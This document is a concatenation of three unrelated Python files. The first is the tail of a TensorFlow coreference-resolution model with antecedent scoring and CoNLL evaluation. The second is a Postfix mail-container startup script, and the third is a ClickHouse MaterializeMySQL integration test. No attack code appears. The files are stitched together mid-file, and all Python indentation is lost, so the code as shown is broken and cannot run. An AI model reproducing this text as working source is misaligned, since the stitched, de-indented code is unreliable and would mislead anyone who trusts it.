with tf.variable_scope("coref_layer", reuse=(i > 0)):
top_antecedent_emb = tf.gather(top_span_emb, top_antecedents) # [k, c, emb]
top_antecedent_scores = top_fast_antecedent_scores + self.get_slow_antecedent_scores(top_span_emb,
top_antecedents,
top_antecedent_emb,
top_antecedent_offsets,
top_span_speaker_ids,
genre_emb) # [k, c]
top_antecedent_weights = tf.nn.softmax(
tf.concat([dummy_scores, top_antecedent_scores], 1)) # [k, c + 1]
top_antecedent_emb = tf.concat([tf.expand_dims(top_span_emb, 1), top_antecedent_emb],
1) # [k, c + 1, emb]
attended_span_emb = tf.reduce_sum(tf.expand_dims(top_antecedent_weights, 2) * top_antecedent_emb,
1) # [k, emb]
with tf.variable_scope("f"):
f = tf.sigmoid(util.projection(tf.concat([top_span_emb, attended_span_emb], 1),
util.shape(top_span_emb, -1))) # [k, emb]
top_span_emb = f * attended_span_emb + (1 - f) * top_span_emb # [k, emb]
"""Stage 3 used original paper section 3 function: the antecedent and top_span composed a pairs (coref entity, demonstraction
pronoun) and computer the pair of score s(gi, gj), s(gi, gj) = top_fast_antecedent_scores + get_slow_antecdents, via softmax,
get the weights of each k span's (c + 1) antecedents weight. P(yi), yi is i mention in top_span. This is a attention mechanism
get a new embedding ai, ai are calculate by attention mechanism. And then concatenate ai and gi. matmul W and via sigmoid to
get a gatekeeper(fi). Finally, gi_final = fi * gi + (1 - fi) * ai.
shape: [k, emb]
"""
top_antecedent_scores = tf.concat([dummy_scores, top_antecedent_scores], 1) # [k, c + 1]
top_antecedent_cluster_ids = tf.gather(top_span_cluster_ids, top_antecedents) # [k, c]
top_antecedent_cluster_ids += tf.to_int32(tf.log(tf.to_float(top_antecedents_mask))) # [k, c]
same_cluster_indicator = tf.equal(top_antecedent_cluster_ids, tf.expand_dims(top_span_cluster_ids, 1)) # [k, c]
non_dummy_indicator = tf.expand_dims(top_span_cluster_ids > 0, 1) # [k, 1]
pairwise_labels = tf.logical_and(same_cluster_indicator, non_dummy_indicator) # [k, c]
dummy_labels = tf.logical_not(tf.reduce_any(pairwise_labels, 1, keepdims=True)) # [k, 1]
top_antecedent_labels = tf.concat([dummy_labels, pairwise_labels], 1) # [k, c + 1]
# print('top_antecedent_scores', top_antecedent_scores, top_antecedent_scores.shape)
# print('top_antecedent_labels', top_antecedent_labels, top_antecedent_labels.shape)
loss = self.softmax_loss(top_antecedent_scores, top_antecedent_labels) # [k]
"""result of k antecedents's softmax loss.
shape: [k]
"""
loss = tf.reduce_sum(loss) # []
return loss
def dget_span_emb(self, head_emb, context_outputs, span_starts, span_ends):
span_emb_list = []
span_start_emb = tf.gather(context_outputs, span_starts) # [k, emb]
span_emb_list.append(span_start_emb)
span_end_emb = tf.gather(context_outputs, span_ends) # [k, emb]
span_emb_list.append(span_end_emb)
span_width = 1 + span_ends - span_starts # [k]
if self.config["use_features"]:
span_width_index = tf.minimum(self.config["max_sentence_width"] - 1, span_width - 1) # [k]
span_width_emb = tf.gather(tf.get_variable("span_width_embeddings", [self.config["max_sentence_width"],
self.config["feature_size"]]),
span_width_index) # [k, emb]
span_width_emb = tf.nn.dropout(span_width_emb, self.dropout)
span_emb_list.append(span_width_emb)
"""
In this place, i want to padding the max_span len to compute head attention span embedding.
"""
if self.config["model_heads"]:
span_indices = tf.expand_dims(tf.range(self.config["max_sentence_width"]), 0) + tf.expand_dims(span_starts,
1) # [k, max_span_width]
span_indices = tf.minimum(util.shape(context_outputs, 0) - 1, span_indices) # [k, max_span_width]
span_text_emb = tf.gather(head_emb, span_indices) # [k, max_span_width, emb]
with tf.variable_scope("head_scores"):
self.head_scores = util.projection(context_outputs, 1) # [num_words, 1]
span_head_scores = tf.gather(self.head_scores, span_indices) # [k, max_span_width, 1]
span_mask = tf.expand_dims(
tf.sequence_mask(span_width, self.config["max_sentence_width"], dtype=tf.float32),
2) # [k, max_span_width, 1]
span_head_scores += tf.log(span_mask) # [k, max_span_width, 1]
span_attention = tf.nn.softmax(span_head_scores, 1) # [k, max_span_width, 1]
span_head_emb = tf.reduce_sum(span_attention * span_text_emb, 1) # [k, emb]
span_emb_list.append(span_head_emb)
# if self.config["model_heads"]:
# span_indices = tf.expand_dims(tf.range(self.config["max_span_width"]), 0) + tf.expand_dims(span_starts,
# 1) # [k, max_span_width]
# span_indices = tf.minimum(util.shape(context_outputs, 0) - 1, span_indices) # [k, max_span_width]
# span_text_emb = tf.gather(head_emb, span_indices) # [k, max_span_width, emb]
#
# with tf.variable_scope("head_scores"):
# self.head_scores = util.projection(context_outputs, 1) # [num_words, 1]
# span_head_scores = tf.gather(self.head_scores, span_indices) # [k, max_span_width, 1]
# span_mask = tf.expand_dims(tf.sequence_mask(span_width, self.config["max_span_width"], dtype=tf.float32), 2) # [k, max_span_width, 1]
# span_head_scores += tf.log(span_mask) # [k, max_span_width, 1]
# span_attention = tf.nn.softmax(span_head_scores, 1) # [k, max_span_width, 1]
# span_head_emb = tf.reduce_sum(span_attention * span_text_emb, 1) # [k, emb]
# span_emb_list.append(span_head_emb)
span_emb = tf.concat(span_emb_list, 1) # [k, emb]
return span_emb # [k, emb]
def get_mention_scores(self, span_emb):
with tf.variable_scope("mention_scores"):
return util.ffnn(span_emb, self.config["ffnn_depth"], self.config["ffnn_size"], 1, self.dropout) # [k, 1]
def softmax_loss(self, antecedent_scores, antecedent_labels):
# print('antecedent_scores', antecedent_scores, antecedent_scores.shape)
# print('antecedent_label', antecedent_labels, antecedent_labels.shape)
gold_scores = antecedent_scores + tf.log(tf.to_float(antecedent_labels)) # [k, max_ant + 1]
marginalized_gold_scores = tf.reduce_logsumexp(gold_scores, [1]) # [k]
log_norm = tf.reduce_logsumexp(antecedent_scores, [1]) # [k]
# print('marginalized_gold_scores', marginalized_gold_scores)
# print('log_norm', log_norm)
return log_norm - marginalized_gold_scores # [k]
def bucket_distance(self, distances):
"""
Places the given values (designed for distances) into 10 semi-logscale buckets:
[0, 1, 2, 3, 4, 5-7, 8-15, 16-31, 32-63, 64+].
"""
logspace_idx = tf.to_int32(tf.floor(tf.log(tf.to_float(distances)) / math.log(2))) + 3
use_identity = tf.to_int32(distances <= 4)
combined_idx = use_identity * distances + (1 - use_identity) * logspace_idx
return tf.clip_by_value(combined_idx, 0, 9)
# return tf.clip_by_value(combined_idx, 0, 12) # 256+
def get_slow_antecedent_scores(self, top_span_emb, top_antecedents, top_antecedent_emb, top_antecedent_offsets,
top_span_speaker_ids, genre_emb):
k = util.shape(top_span_emb, 0)
c = util.shape(top_antecedents, 1)
feature_emb_list = []
if self.config["use_metadata"]:
top_antecedent_speaker_ids = tf.gather(top_span_speaker_ids, top_antecedents) # [k, c]
same_speaker = tf.equal(tf.expand_dims(top_span_speaker_ids, 1), top_antecedent_speaker_ids) # [k, c]
speaker_pair_emb = tf.gather(tf.get_variable("same_speaker_emb", [2, self.config["feature_size"]]),
tf.to_int32(same_speaker)) # [k, c, emb]
feature_emb_list.append(speaker_pair_emb)
tiled_genre_emb = tf.tile(tf.expand_dims(tf.expand_dims(genre_emb, 0), 0), [k, c, 1]) # [k, c, emb]
feature_emb_list.append(tiled_genre_emb)
if self.config["use_features"]:
""" i think of that if want to increase the distance of cluster pair, we can change the [10] antecedent_distance_emb,
and the bucket_distance function.
"""
antecedent_distance_buckets = self.bucket_distance(top_antecedent_offsets) # [k, c]
antecedent_distance_emb = tf.gather(
tf.get_variable("antecedent_distance_emb", [10, self.config["feature_size"]]),
antecedent_distance_buckets) # [k, c]
# antecedent_distance_emb = tf.gather(tf.get_variable("antecedent_distance_emb", [13, self.config["feature_size"]]), antecedent_distance_buckets) # [k, c]
feature_emb_list.append(antecedent_distance_emb)
feature_emb = tf.concat(feature_emb_list, 2) # [k, c, emb]
feature_emb = tf.nn.dropout(feature_emb, self.dropout) # [k, c, emb]
target_emb = tf.expand_dims(top_span_emb, 1) # [k, 1, emb]
similarity_emb = top_antecedent_emb * target_emb # [k, c, emb]
target_emb = tf.tile(target_emb, [1, c, 1]) # [k, c, emb]
pair_emb = tf.concat([target_emb, top_antecedent_emb, similarity_emb, feature_emb], 2) # [k, c, emb]
with tf.variable_scope("slow_antecedent_scores"):
slow_antecedent_scores = util.ffnn(pair_emb, self.config["ffnn_depth"], self.config["ffnn_size"], 1,
self.dropout) # [k, c, 1]
slow_antecedent_scores = tf.squeeze(slow_antecedent_scores, 2) # [k, c]
return slow_antecedent_scores # [k, c]
def get_fast_antecedent_scores(self, top_span_emb):
with tf.variable_scope("src_projection"):
source_top_span_emb = tf.nn.dropout(util.projection(top_span_emb, util.shape(top_span_emb, -1)),
self.dropout) # [k, emb]
target_top_span_emb = tf.nn.dropout(top_span_emb, self.dropout) # [k, emb]
return tf.matmul(source_top_span_emb, target_top_span_emb, transpose_b=True) # [k, k]
def flatten_emb_by_sentence(self, emb, text_len_mask):
num_sentences = tf.shape(emb)[0]
max_sentence_length = tf.shape(emb)[1]
emb_rank = len(emb.get_shape())
if emb_rank == 2:
flattened_emb = tf.reshape(emb, [num_sentences * max_sentence_length])
elif emb_rank == 3:
flattened_emb = tf.reshape(emb, [num_sentences * max_sentence_length, util.shape(emb, 2)])
else:
raise ValueError("Unsupported rank: {}".format(emb_rank))
return tf.boolean_mask(flattened_emb, tf.reshape(text_len_mask, [num_sentences * max_sentence_length]))
def lstm_contextualize(self, text_emb, text_len, text_len_mask):
num_sentences = tf.shape(text_emb)[0]
current_inputs = text_emb # [num_sentences, max_sentence_length, emb]
for layer in range(self.config["contextualization_layers"]):
with tf.variable_scope("layer_{}".format(layer)):
with tf.variable_scope("fw_cell"):
cell_fw = util.CustomLSTMCell(self.config["contextualization_size"], num_sentences,
self.lstm_dropout)
with tf.variable_scope("bw_cell"):
cell_bw = util.CustomLSTMCell(self.config["contextualization_size"], num_sentences,
self.lstm_dropout)
state_fw = tf.contrib.rnn.LSTMStateTuple(tf.tile(cell_fw.initial_state.c, [num_sentences, 1]),
tf.tile(cell_fw.initial_state.h, [num_sentences, 1]))
state_bw = tf.contrib.rnn.LSTMStateTuple(tf.tile(cell_bw.initial_state.c, [num_sentences, 1]),
tf.tile(cell_bw.initial_state.h, [num_sentences, 1]))
(fw_outputs, bw_outputs), _ = tf.nn.bidirectional_dynamic_rnn(
cell_fw=cell_fw,
cell_bw=cell_bw,
inputs=current_inputs,
sequence_length=text_len,
initial_state_fw=state_fw,
initial_state_bw=state_bw)
text_outputs = tf.concat([fw_outputs, bw_outputs], 2) # [num_sentences, max_sentence_length, emb]
text_outputs = tf.nn.dropout(text_outputs, self.lstm_dropout)
if layer > 0:
highway_gates = tf.sigmoid(util.projection(text_outputs, util.shape(text_outputs,
2))) # [num_sentences, max_sentence_length, emb]
text_outputs = highway_gates * text_outputs + (1 - highway_gates) * current_inputs
current_inputs = text_outputs
return self.flatten_emb_by_sentence(text_outputs, text_len_mask)
def get_predicted_antecedents(self, antecedents, antecedent_scores):
predicted_antecedents = []
for i, index in enumerate(np.argmax(antecedent_scores, axis=1) - 1):
if index < 0:
predicted_antecedents.append(-1)
else:
predicted_antecedents.append(antecedents[i, index])
return predicted_antecedents
def get_predicted_clusters(self, top_span_starts, top_span_ends, predicted_antecedents):
mention_to_predicted = {}
predicted_clusters = []
for i, predicted_index in enumerate(predicted_antecedents):
if predicted_index < 0:
continue
assert i > predicted_index
predicted_antecedent = (int(top_span_starts[predicted_index]), int(top_span_ends[predicted_index]))
if predicted_antecedent in mention_to_predicted:
predicted_cluster = mention_to_predicted[predicted_antecedent]
else:
predicted_cluster = len(predicted_clusters)
predicted_clusters.append([predicted_antecedent])
mention_to_predicted[predicted_antecedent] = predicted_cluster
mention = (int(top_span_starts[i]), int(top_span_ends[i]))
predicted_clusters[predicted_cluster].append(mention)
mention_to_predicted[mention] = predicted_cluster
predicted_clusters = [tuple(pc) for pc in predicted_clusters]
mention_to_predicted = {m: predicted_clusters[i] for m, i in mention_to_predicted.items()}
return predicted_clusters, mention_to_predicted
def evaluate_coref(self, top_span_starts, top_span_ends, predicted_antecedents, gold_clusters, evaluator):
gold_clusters = [tuple(tuple(m) for m in gc) for gc in gold_clusters]
mention_to_gold = {}
for gc in gold_clusters:
for mention in gc:
mention_to_gold[mention] = gc
predicted_clusters, mention_to_predicted = self.get_predicted_clusters(top_span_starts, top_span_ends,
predicted_antecedents)
evaluator.update(predicted_clusters, gold_clusters, mention_to_predicted, mention_to_gold)
return predicted_clusters
def load_eval_data(self):
if self.eval_data is None:
def load_line(line):
example = json.loads(line)
return self.tensorize_example(example, is_training=False), example
with open(self.config["eval_path"]) as f:
self.eval_data = [load_line(l) for l in f.readlines()]
num_words = sum(tensorized_example[2].sum() for tensorized_example, _ in self.eval_data)
print("Loaded {} eval examples.".format(len(self.eval_data)))
def evaluate(self, session, official_stdout=False):
self.load_eval_data()
coref_predictions = {}
coref_evaluator = metrics.CorefEvaluator()
for example_num, (tensorized_example, example) in enumerate(self.eval_data):
tokens, context_word_emb, head_word_emb, lm_emb, char_index, text_len, speaker_ids, genre, is_training, gold_starts, gold_ends, _, sentence_index_start, sentence_index_end = tensorized_example
# print('tokens', tokens, tokens.shape)
# print('context_word_emb', context_word_emb, context_word_emb.shape)
# print('head_word_emb', head_word_emb, head_word_emb.shape)
# print('lm', lm_emb, lm_emb.shape)
feed_dict = {i: t for i, t in zip(self.input_tensors, tensorized_example)}
candidate_span_emb, candidate_starts, candidate_ends, candidate_mention_scores, top_span_starts, top_span_ends, top_antecedents, top_antecedent_scores = session.run(
self.predictions, feed_dict=feed_dict)
# print('candidate_starts', candidate_starts)
# print('end', candidate_ends)
# print('top_span_starts', top_span_starts, top_span_ends.shape)
# print('top_span_end', top_span_ends, top_span_ends.shape)
# print('top_antecedent_scores', top_antecedent_scores)
predicted_antecedents = self.get_predicted_antecedents(top_antecedents, top_antecedent_scores)
# print('predicted_antecedents', predicted_antecedents)
coref_predictions[example["doc_key"]] = self.evaluate_coref(top_span_starts, top_span_ends,
predicted_antecedents, example["clusters"],
coref_evaluator)
if example_num % 10 == 0:
print("Evaluated {}/{} examples.".format(example_num + 1, len(self.eval_data)))
print('coref_predictions:', coref_predictions, len(coref_predictions))
tools.write_json('/content/drive/My Drive/coreference/e2e/e2e-coref/coref_predictions.json',
coref_predictions)
"""this evaluation code is used to solve CoNLL style dataset evaluetions."""
summary_dict = {}
conll_results = conll.evaluate_conll(self.config["conll_eval_path"], coref_predictions, official_stdout)
average_f1 = sum(results["f"] for results in conll_results.values()) / len(conll_results)
# summary_dict["Average F1 (conll)"] = average_f1
# print("Average F1 (conll): {:.2f}%".format(average_f1))
p, r, f = coref_evaluator.get_prf()
summary_dict["Average F1 (py)"] = f
print("Average F1 (py): {:.2f}%".format(f * 100))
summary_dict["Average precision (py)"] = p
print("Average precision (py): {:.2f}%".format(p * 100))
summary_dict["Average recall (py)"] = r
print("Average recall (py): {:.2f}%".format(r * 100))
muc_p, b_p, ceaf_p = coref_evaluator.get_all_precision()
muc_r, b_r, ceaf_r = coref_evaluator.get_all_recall()
muc_f1, b_f1, ceaf_f1 = coref_evaluator.get_all_f1()
print('\n', "Precision:", "\n")
print("muc:", "{:.2f}%".format(muc_p * 100), '\n')
print("b_cube:", "{:.2f}%".format(b_p * 100), '\n')
print("ceaf:", "{:.2f}%".format(ceaf_p * 100), '\n')
print('\n', "Recall:", "\n")
print("muc:", "{:.2f}%".format(muc_r * 100), '\n')
print("b_cube:", "{:.2f}%".format(b_r * 100), '\n')
print("ceaf:", "{:.2f}%".format(ceaf_r * 100), '\n')
print('\n', "F1:", "\n")
print("muc:", "{:.2f}%".format(muc_f1 * 100), '\n')
print("b_cube:", "{:.2f}%".format(b_f1 * 100), '\n')
print("ceaf:", "{:.2f}%".format(ceaf_f1 * 100), '\n')
return util.make_summary(summary_dict), f
# def evaluate_neuralcoref(self, session, official_stdout=False):
# self.load_eval_data()
# coref_predictions = {}
# coref_evaluator = metrics.CorefEvaluator()
# import re
# fuhao = re.compile(r'[\,|\.|\?|\!|\']')
# for example_num, (tensorized_example, example) in enumerate(self.eval_data):
# # _, _, _, _, _, _, _, _, _, gold_starts, gold_ends, _ = tensorized_example
# # feed_dict = {i:t for i,t in zip(self.input_tensors, tensorized_example)}
# # candidate_starts, candidate_ends, candidate_mention_scores, top_span_starts, top_span_ends, top_antecedents, top_antecedent_scores = session.run(self.predictions, feed_dict=feed_dict)
# ss1 = sum(example["sentences"], [])
# ss = ''
# for idx, i in enumerate(ss1):
# if fuhao.match(i) or idx == 0:
# ss = ss + i
# elif idx != 0:
# ss = ss + ' ' + i
# doc = nlp(ss)
# # predicted_antecedents = self.get_predicted_antecedents(top_antecedents, top_antecedent_scores)
# if not doc._.has_coref:
# coref_predictions[example["doc_key"]] = []
# continue
# # sample : [((16, 16), (19, 23)), ((25, 27), (42, 44), (57, 59)), ((65, 66), (82, 83), (101, 102))]
# predictions = []
# top_span_starts = []
# top_span_ends = []
# lookup = {}
# conll_token_index = 0
# conll_ci = 0
# spacy_ci = 0
# print()
# print('ss', ss)
# for i in range(len(doc)):
# st = doc[i].text
# print(st)
# spacy_ci += len(st)
# while conll_ci < spacy_ci:
# conll_ci += len(ss1[conll_token_index])
# conll_token_index += 1
# lookup[i] = conll_token_index - 1
# print(lookup)
# for cluster in doc._.coref_clusters:
# _tmp = []
# print('cluster:', cluster)
# for mention in cluster:
# print('mention:', mention)
# print('start:', mention.start)
# print('end:', mention.end)
# print(ss[mention.start:mention.end])
# print('look:', ss[lookup[mention.start]:lookup[mention.end]])
# # print()
# _tmp.append((lookup[mention.start], lookup[mention.end - 1]))
# top_span_starts.append(mention.start)
# top_span_ends.append(mention.end - 1)
# predictions.append(tuple(_tmp))
# # print(predictions)
# coref_predictions[example["doc_key"]] = predictions
# # print(coref_predictions)
# if example_num % 10 == 0:
# print("Evaluated {}/{} examples.".format(example_num + 1, len(self.eval_data)))
#
# summary_dict = {}
# conll_results = conll.evaluate_conll(self.config["conll_eval_path"], coref_predictions, official_stdout)
# average_f1 = sum(results["f"] for results in conll_results.values()) / len(conll_results)
# summary_dict["Average F1 (conll)"] = average_f1
# print("Average F1 (conll): {:.2f}%".format(average_f1))
#
# p, r, f = coref_evaluator.get_prf()
# summary_dict["Average F1 (py)"] = f
# print("Average F1 (py): {:.2f}%".format(f * 100))
# summary_dict["Average precision (py)"] = p
# print("Average precision (py): {:.2f}%".format(p * 100))
# summary_dict["Average recall (py)"] = r
# print("Average recall (py): {:.2f}%".format(r * 100))
#
# return util.make_summary(summary_dict), average_f1 |
start.py | #!/usr/bin/python3
import os
import glob
import shutil
import multiprocessing
import logging as log
import sys
from podop import run_server
from pwd import getpwnam
from socrate import system, conf
log.basicConfig(stream=sys.stderr, level=os.environ.get("LOG_LEVEL", "WARNING"))
def start_podop():
os.setuid(getpwnam('postfix').pw_uid)
os.mkdir('/dev/shm/postfix',mode=0o700)
url = "http://" + os.environ["ADMIN_ADDRESS"] + "/internal/postfix/"
# TODO: Remove verbosity setting from Podop?
run_server(0, "postfix", "/tmp/podop.socket", [
("transport", "url", url + "transport/§"),
("alias", "url", url + "alias/§"),
("domain", "url", url + "domain/§"),
("mailbox", "url", url + "mailbox/§"),
("recipientmap", "url", url + "recipient/map/§"),
("sendermap", "url", url + "sender/map/§"),
("senderaccess", "url", url + "sender/access/§"),
("senderlogin", "url", url + "sender/login/§"),
("senderrate", "url", url + "sender/rate/§")
])
def is_valid_postconf_line(line):
return not line.startswith("#") \
and not line == ''
# Actual startup script
os.environ["FRONT_ADDRESS"] = system.get_host_address_from_environment("FRONT", "front")
os.environ["ADMIN_ADDRESS"] = system.get_host_address_from_environment("ADMIN", "admin")
os.environ["ANTISPAM_MILTER_ADDRESS"] = system.get_host_address_from_environment("ANTISPAM_MILTER", "antispam:11332")
os.environ["LMTP_ADDRESS"] = system.get_host_address_from_environment("LMTP", "imap:2525")
os.environ["OUTCLEAN"] = os.environ["HOSTNAMES"].split(",")[0]
try:
_to_lookup = os.environ["OUTCLEAN"]
# Ensure we lookup a FQDN: @see #1884
if not _to_lookup.endswith('.'):
_to_lookup += '.'
os.environ["OUTCLEAN_ADDRESS"] = system.resolve_hostname(_to_lookup)
except:
os.environ["OUTCLEAN_ADDRESS"] = "10.10.10.10"
for postfix_file in glob.glob("/conf/*.cf"):
conf.jinja(postfix_file, os.environ, os.path.join("/etc/postfix", os.path.basename(postfix_file)))
if os.path.exists("/overrides/postfix.cf"):
for line in open("/overrides/postfix.cf").read().strip().split("\n"):
if is_valid_postconf_line(line):
os.system('postconf -e "{}"'.format(line))
if os.path.exists("/overrides/postfix.master"):
for line in open("/overrides/postfix.master").read().strip().split("\n"):
if is_valid_postconf_line(line):
os.system('postconf -Me "{}"'.format(line))
for map_file in glob.glob("/overrides/*.map"):
destination = os.path.join("/etc/postfix", os.path.basename(map_file))
shutil.copyfile(map_file, destination)
os.system("postmap {}".format(destination))
os.remove(destination)
if not os.path.exists("/etc/postfix/tls_policy.map.db"):
with open("/etc/postfix/tls_policy.map", "w") as f:
for domain in ['gmail.com', 'yahoo.com', 'hotmail.com', 'aol.com', 'outlook.com', 'comcast.net', 'icloud.com', 'msn.com', 'hotmail.co.uk', 'live.com', 'yahoo.co.in', 'me.com', 'mail.ru', 'cox.net', 'yahoo.co.uk', 'verizon.net', 'ymail.com', 'hotmail.it', 'kw.com', 'yahoo.com.tw', 'mac.com', 'live.se', 'live.nl', 'yahoo.com.br', 'googlemail.com', 'libero.it', 'web.de', 'allstate.com', 'btinternet.com', 'online.no', 'yahoo.com.au', 'live.dk', 'earthlink.net', 'yahoo.fr', 'yahoo.it', 'gmx.de', 'hotmail.fr', 'shawinc.com', 'yahoo.de', 'moe.edu.sg', 'naver.com', 'bigpond.com', 'statefarm.com', 'remax.net', 'rocketmail.com', 'live.no', 'yahoo.ca', 'bigpond.net.au', 'hotmail.se', 'gmx.at', 'live.co.uk', 'mail.com', 'yahoo.in', 'yandex.ru', 'qq.com', 'charter.net', 'indeedemail.com', 'alice.it', 'hotmail.de', 'bluewin.ch', 'optonline.net', 'wp.pl', 'yahoo.es', 'hotmail.no', 'pindotmedia.com', 'orange.fr', 'live.it', 'yahoo.co.id', 'yahoo.no', 'hotmail.es', 'morganstanley.com', 'wellsfargo.com', 'wanadoo.fr', 'facebook.com', 'yahoo.se', 'fema.dhs.gov', 'rogers.com', 'yahoo.com.hk', 'live.com.au', 'nic.in', 'nab.com.au', 'ubs.com', 'shaw.ca', 'umich.edu', 'westpac.com.au', 'yahoo.com.mx', 'yahoo.com.sg', 'farmersagent.com', 'yahoo.dk', 'dhs.gov']:
f.write(f'{domain}\tsecure\n')
os.system("postmap /etc/postfix/tls_policy.map")
if "RELAYUSER" in os.environ:
path = "/etc/postfix/sasl_passwd"
conf.jinja("/conf/sasl_passwd", os.environ, path)
os.system("postmap {}".format(path))
# Run Podop and Postfix
multiprocessing.Process(target=start_podop).start()
os.system("/usr/libexec/postfix/post-install meta_directory=/etc/postfix create-missing")
# Before starting postfix, we need to check permissions on /queue
# in the event that postfix,postdrop id have changed
os.system("postfix set-permissions")
os.system("postfix start-fg")
|
materialize_with_ddl.py | import time
import pymysql.cursors
import pytest
from helpers.network import PartitionManager
import pytest
from helpers.client import QueryRuntimeException
from helpers.cluster import get_docker_compose_path, run_and_check
import random
import threading
from multiprocessing.dummy import Pool
def check_query(clickhouse_node, query, result_set, retry_count=60, interval_seconds=3):
lastest_result = ''
for i in range(retry_count):
try:
lastest_result = clickhouse_node.query(query)
if result_set == lastest_result:
return
print(lastest_result)
time.sleep(interval_seconds)
except Exception as e:
print(("check_query retry {} exception {}".format(i + 1, e)))
time.sleep(interval_seconds)
else:
assert clickhouse_node.query(query) == result_set
def dml_with_materialize_mysql_database(clickhouse_node, mysql_node, service_name):
mysql_node.query("DROP DATABASE IF EXISTS test_database")
clickhouse_node.query("DROP DATABASE IF EXISTS test_database")
mysql_node.query("CREATE DATABASE test_database DEFAULT CHARACTER SET 'utf8'")
# existed before the mapping was created
mysql_node.query("CREATE TABLE test_database.test_table_1 ("
"`key` INT NOT NULL PRIMARY KEY, "
"unsigned_tiny_int TINYINT UNSIGNED, tiny_int TINYINT, "
"unsigned_small_int SMALLINT UNSIGNED, small_int SMALLINT, "
"unsigned_medium_int MEDIUMINT UNSIGNED, medium_int MEDIUMINT, "
"unsigned_int INT UNSIGNED, _int INT, "
"unsigned_integer INTEGER UNSIGNED, _integer INTEGER, "
"unsigned_bigint BIGINT UNSIGNED, _bigint BIGINT, "
"/* Need ClickHouse support read mysql decimal unsigned_decimal DECIMAL(19, 10) UNSIGNED, _decimal DECIMAL(19, 10), */"
"unsigned_float FLOAT UNSIGNED, _float FLOAT, "
"unsigned_double DOUBLE UNSIGNED, _double DOUBLE, "
"_varchar VARCHAR(10), _char CHAR(10), binary_col BINARY(8), "
"/* Need ClickHouse support Enum('a', 'b', 'v') _enum ENUM('a', 'b', 'c'), */"
"_date Date, _datetime DateTime, _timestamp TIMESTAMP, _bool BOOLEAN) ENGINE = InnoDB;")
# it already has some data
mysql_node.query("""
INSERT INTO test_database.test_table_1 VALUES(1, 1, -1, 2, -2, 3, -3, 4, -4, 5, -5, 6, -6, 3.2, -3.2, 3.4, -3.4, 'varchar', 'char', 'binary',
'2020-01-01', '2020-01-01 00:00:00', '2020-01-01 00:00:00', true);
""")
clickhouse_node.query(
"CREATE DATABASE test_database ENGINE = MaterializeMySQL('{}:3306', 'test_database', 'root', 'clickhouse')".format(
service_name))
assert "test_database" in clickhouse_node.query("SHOW DATABASES")
check_query(clickhouse_node, "SELECT * FROM test_database.test_table_1 ORDER BY key FORMAT TSV",
"1\t1\t-1\t2\t-2\t3\t-3\t4\t-4\t5\t-5\t6\t-6\t3.2\t-3.2\t3.4\t-3.4\tvarchar\tchar\tbinary\\0\\0\t2020-01-01\t"
"2020-01-01 00:00:00\t2020-01-01 00:00:00\t1\n")
mysql_node.query("""
INSERT INTO test_database.test_table_1 VALUES(2, 1, -1, 2, -2, 3, -3, 4, -4, 5, -5, 6, -6, 3.2, -3.2, 3.4, -3.4, 'varchar', 'char', 'binary',
'2020-01-01', '2020-01-01 00:00:00', '2020-01-01 00:00:00', false);
""")
check_query(clickhouse_node, "SELECT * FROM test_database.test_table_1 ORDER BY key FORMAT TSV",
"1\t1\t-1\t2\t-2\t3\t-3\t4\t-4\t5\t-5\t6\t-6\t3.2\t-3.2\t3.4\t-3.4\tvarchar\tchar\tbinary\\0\\0\t2020-01-01\t"
"2020-01-01 00:00:00\t2020-01-01 00:00:00\t1\n2\t1\t-1\t2\t-2\t3\t-3\t4\t-4\t5\t-5\t6\t-6\t3.2\t-3.2\t3.4\t-3.4\t"
"varchar\tchar\tbinary\\0\\0\t2020-01-01\t2020-01-01 00:00:00\t2020-01-01 00:00:00\t0\n")
mysql_node.query("UPDATE test_database.test_table_1 SET unsigned_tiny_int = 2 WHERE `key` = 1")
check_query(clickhouse_node, """
SELECT key, unsigned_tiny_int, tiny_int, unsigned_small_int,
small_int, unsigned_medium_int, medium_int, unsigned_int, _int, unsigned_integer, _integer,
unsigned_bigint, _bigint, unsigned_float, _float, unsigned_double, _double, _varchar, _char, binary_col,
_date, _datetime, /* exclude it, because ON UPDATE CURRENT_TIMESTAMP _timestamp, */
_bool FROM test_database.test_table_1 ORDER BY key FORMAT TSV
""",
"1\t2\t-1\t2\t-2\t3\t-3\t4\t-4\t5\t-5\t6\t-6\t3.2\t-3.2\t3.4\t-3.4\tvarchar\tchar\tbinary\\0\\0\t2020-01-01\t"
"2020-01-01 00:00:00\t1\n2\t1\t-1\t2\t-2\t3\t-3\t4\t-4\t5\t-5\t6\t-6\t3.2\t-3.2\t3.4\t-3.4\t"
"varchar\tchar\tbinary\\0\\0\t2020-01-01\t2020-01-01 00:00:00\t0\n")
# update primary key
mysql_node.query("UPDATE test_database.test_table_1 SET `key` = 3 WHERE `unsigned_tiny_int` = 2")
check_query(clickhouse_node, "SELECT key, unsigned_tiny_int, tiny_int, unsigned_small_int,"
" small_int, unsigned_medium_int, medium_int, unsigned_int, _int, unsigned_integer, _integer, "
" unsigned_bigint, _bigint, unsigned_float, _float, unsigned_double, _double, _varchar, _char, binary_col, "
" _date, _datetime, /* exclude it, because ON UPDATE CURRENT_TIMESTAMP _timestamp, */ "
" _bool FROM test_database.test_table_1 ORDER BY key FORMAT TSV",
"2\t1\t-1\t2\t-2\t3\t-3\t4\t-4\t5\t-5\t6\t-6\t3.2\t-3.2\t3.4\t-3.4\t"
"varchar\tchar\tbinary\\0\\0\t2020-01-01\t2020-01-01 00:00:00\t0\n3\t2\t-1\t2\t-2\t3\t-3\t"
"4\t-4\t5\t-5\t6\t-6\t3.2\t-3.2\t3.4\t-3.4\tvarchar\tchar\tbinary\\0\\0\t2020-01-01\t2020-01-01 00:00:00\t1\n")
mysql_node.query('DELETE FROM test_database.test_table_1 WHERE `key` = 2')
check_query(clickhouse_node, "SELECT key, unsigned_tiny_int, tiny_int, unsigned_small_int,"
" small_int, unsigned_medium_int, medium_int, unsigned_int, _int, unsigned_integer, _integer, "
" unsigned_bigint, _bigint, unsigned_float, _float, unsigned_double, _double, _varchar, _char, binary_col, "
" _date, _datetime, /* exclude it, because ON UPDATE CURRENT_TIMESTAMP _timestamp, */ "
" _bool FROM test_database.test_table_1 ORDER BY key FORMAT TSV",
"3\t2\t-1\t2\t-2\t3\t-3\t4\t-4\t5\t-5\t6\t-6\t3.2\t-3.2\t3.4\t-3.4\tvarchar\tchar\tbinary\\0\\0\t2020-01-01\t"
"2020-01-01 00:00:00\t1\n")
mysql_node.query('DELETE FROM test_database.test_table_1 WHERE `unsigned_tiny_int` = 2')
check_query(clickhouse_node, "SELECT * FROM test_database.test_table_1 ORDER BY key FORMAT TSV", "")
